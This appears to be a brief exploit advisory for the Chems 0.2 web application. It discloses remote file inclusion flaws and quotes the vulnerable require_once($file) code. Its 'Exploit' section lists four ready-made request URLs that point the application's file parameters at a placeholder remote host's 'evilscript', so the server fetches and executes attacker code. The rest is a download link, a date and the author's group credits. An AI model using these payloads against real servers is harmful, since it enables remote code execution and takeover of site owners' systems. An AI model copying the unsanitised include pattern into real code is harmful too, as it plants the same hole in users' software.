Chems version 0.2 suffers from remote file inclusion vulnerabilities.
65fe2ae9522fcac22c5cd110531dfa678cc08c9c4f39e0c27ed1b3a4800f1a90
Chems-0.2 Remote File Inclusion
---------|
Download:|
---------|
http://downloads.sourceforge.net/chems/chems-0.2.tar.bz2?modtime=1193610635&big_mirror=0
----------------|
Timeline:9.11.07|
----------------|
-------|
Exploit|
-------|
/cdb.php?file=http://host/evilscript?
/posts_links.php?f=http://host/evilscript?
/functions.php?f=http://host/evilscript?
/pages_links.php?f=http://host/evilscript?
bug
---
require_once($file);
return ($records - 1);
#Return the given record taken from the given file.
require_once($f);
#Include the module.
------|
Author|
------|
fl0 fl0w
e-mail:flo[underscore]flow[underscore]supremacy[at]yahoo[dot]com
site:http://fl0-fl0w.docspages.com
A renslt.org team member ...we're not the only ones but we're the best"